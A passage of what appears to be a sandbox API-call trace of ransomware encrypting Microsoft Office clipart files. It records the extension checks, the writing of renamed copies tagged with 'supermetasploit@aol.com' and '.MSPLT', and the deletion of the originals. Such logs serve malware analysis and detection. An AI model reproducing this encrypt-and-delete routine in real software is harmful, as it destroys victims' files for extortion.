(lpString1=".bz2", lpString2=".WMF") returned -1 [0313.556] lstrlenW (lpString=".7z") returned 3 [0313.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.557] lstrlenW (lpString=".dbf") returned 4 [0313.557] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.557] lstrlenW (lpString=".1cd") returned 4 [0313.557] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.557] lstrlenW (lpString=".jpg") returned 4 [0313.558] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.558] lstrlenW (lpString=".doc") returned 4 [0313.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.558] lstrlenW (lpString=".docx") returned 5 [0313.558] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.558] lstrlenW (lpString=".pdf") returned 4 [0313.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.558] lstrlenW (lpString=".xls") returned 4 [0313.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.558] lstrlenW (lpString=".xlsx") returned 5 [0313.558] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.558] lstrlenW (lpString=".ppt") returned 4 [0313.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.559] lstrlenW (lpString=".zip") returned 4 [0313.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.559] lstrlenW (lpString=".rar") returned 4 [0313.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.559] lstrlenW (lpString=".bz2") returned 4 [0313.559] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0313.559] lstrlenW (lpString=".7z") returned 3 [0313.559] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.559] lstrlenW (lpString=".dbf") returned 4 [0313.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.559] lstrlenW (lpString=".1cd") returned 4 [0313.559] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.559] lstrlenW (lpString=".jpg") returned 4 [0313.559] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.560] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0313.560] lstrlenW (lpString="BS01080_.WMF") returned 12 [0313.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0313.565] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2732) returned 1 [0313.565] CloseHandle (hObject=0x54c) returned 1 [0313.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf")) returned 0x220 [0313.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0313.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0313.566] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.567] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0313.568] GetLastError () returned 0x0 [0313.568] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xaac, lpOverlapped=0x0) returned 1 [0313.690] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xab0, lpOverlapped=0x0) returned 1 [0313.692] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0313.692] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0313.692] SetEndOfFile (hFile=0x488) returned 1 [0313.692] CloseHandle (hObject=0x488) returned 1 [0313.692] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.692] SetEndOfFile (hFile=0x54c) returned 1 [0313.697] CloseHandle (hObject=0x54c) returned 1 [0313.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0314.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.182] lstrlenW (lpString=".doc") returned 4 [0314.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString=".docx") returned 5 [0314.183] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.183] lstrlenW (lpString=".pdf") returned 4 [0314.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString=".xls") returned 4 [0314.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.183] lstrlenW (lpString=".xlsx") returned 5 [0314.183] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.183] lstrlenW (lpString=".ppt") returned 4 [0314.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.183] lstrlenW (lpString=".zip") returned 4 [0314.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.183] lstrlenW (lpString=".rar") returned 4 [0314.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString=".bz2") returned 4 [0314.183] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString=".7z") returned 3 [0314.183] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.183] lstrlenW (lpString=".dbf") returned 4 [0314.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.183] lstrlenW (lpString=".1cd") returned 4 [0314.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.184] lstrlenW (lpString=".jpg") returned 4 [0314.184] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.184] lstrlenW (lpString=".doc") returned 4 [0314.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString=".docx") returned 5 [0314.184] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.184] lstrlenW (lpString=".pdf") returned 4 [0314.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString=".xls") returned 4 [0314.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.184] lstrlenW (lpString=".xlsx") returned 5 [0314.184] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.184] lstrlenW (lpString=".ppt") returned 4 [0314.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.184] lstrlenW (lpString=".zip") returned 4 [0314.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.184] lstrlenW (lpString=".rar") returned 4 [0314.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.184] lstrlenW (lpString=".bz2") returned 4 [0314.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.185] lstrlenW (lpString=".7z") returned 3 [0314.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.185] lstrlenW (lpString=".dbf") returned 4 [0314.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.185] lstrlenW (lpString=".1cd") returned 4 [0314.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0314.185] lstrlenW (lpString=".jpg") returned 4 [0314.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.185] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.185] lstrlenW (lpString="BS01634_.WMF") returned 12 [0314.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0314.470] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3494) returned 1 [0314.470] CloseHandle (hObject=0x524) returned 1 [0314.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf")) returned 0x220 [0314.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0314.589] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.589] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0314.591] GetLastError () returned 0x0 [0314.591] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xda6, lpOverlapped=0x0) returned 1 [0314.596] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xdb0, lpOverlapped=0x0) returned 1 [0314.597] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.598] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.598] SetEndOfFile (hFile=0x488) returned 1 [0314.598] CloseHandle (hObject=0x488) returned 1 [0314.598] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.598] SetEndOfFile (hFile=0x54c) returned 1 [0314.603] CloseHandle (hObject=0x54c) returned 1 [0314.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.603] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0314.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.605] lstrlenW (lpString=".doc") returned 4 [0314.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.605] lstrlenW (lpString=".docx") returned 5 [0314.605] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.605] lstrlenW (lpString=".pdf") returned 4 [0314.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.605] lstrlenW (lpString=".xls") returned 4 [0314.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.605] lstrlenW (lpString=".xlsx") returned 5 [0314.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.605] lstrlenW (lpString=".ppt") returned 4 [0314.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.605] lstrlenW (lpString=".zip") returned 4 [0314.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.606] lstrlenW (lpString=".rar") returned 4 [0314.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.606] lstrlenW (lpString=".bz2") returned 4 [0314.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.606] lstrlenW (lpString=".7z") returned 3 [0314.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.606] lstrlenW (lpString=".dbf") returned 4 [0314.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.606] lstrlenW (lpString=".1cd") returned 4 [0314.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.606] lstrlenW (lpString=".jpg") returned 4 [0314.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.606] lstrlenW (lpString=".doc") returned 4 [0314.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.607] lstrlenW (lpString=".docx") returned 5 [0314.607] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.607] lstrlenW (lpString=".pdf") returned 4 [0314.607] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.607] lstrlenW (lpString=".xls") returned 4 [0314.607] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.607] lstrlenW (lpString=".xlsx") returned 5 [0314.607] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.607] lstrlenW (lpString=".ppt") returned 4 [0314.607] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.607] lstrlenW (lpString=".zip") returned 4 [0314.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.607] lstrlenW (lpString=".rar") returned 4 [0314.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.607] lstrlenW (lpString=".bz2") returned 4 [0314.607] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.607] lstrlenW (lpString=".7z") returned 3 [0314.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.607] lstrlenW (lpString=".dbf") returned 4 [0314.608] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.608] lstrlenW (lpString=".1cd") returned 4 [0314.608] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0314.608] lstrlenW (lpString=".jpg") returned 4 [0314.608] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.608] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.608] lstrlenW (lpString="BS01639_.WMF") returned 12 [0314.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0314.609] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4236) returned 1 [0314.609] CloseHandle (hObject=0x54c) returned 1 [0314.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf")) returned 0x220 [0314.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0314.610] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.611] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0314.612] GetLastError () returned 0x0 [0314.612] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x108c, lpOverlapped=0x0) returned 1 [0315.078] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x1090, lpOverlapped=0x0) returned 1 [0315.080] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0315.080] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0315.080] SetEndOfFile (hFile=0x488) returned 1 [0315.080] CloseHandle (hObject=0x488) returned 1 [0315.080] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0315.081] SetEndOfFile (hFile=0x54c) returned 1 [0315.085] CloseHandle (hObject=0x54c) returned 1 [0315.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0315.372] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0315.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.590] lstrlenW (lpString=".doc") returned 4 [0315.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString=".docx") returned 5 [0315.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0315.591] lstrlenW (lpString=".pdf") returned 4 [0315.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString=".xls") returned 4 [0315.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.591] lstrlenW (lpString=".xlsx") returned 5 [0315.591] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0315.591] lstrlenW (lpString=".ppt") returned 4 [0315.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.591] lstrlenW (lpString=".zip") returned 4 [0315.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.591] lstrlenW (lpString=".rar") returned 4 [0315.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString=".bz2") returned 4 [0315.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString=".7z") returned 3 [0315.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.591] lstrlenW (lpString=".dbf") returned 4 [0315.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString="C:\\Program Files\\Microsoft 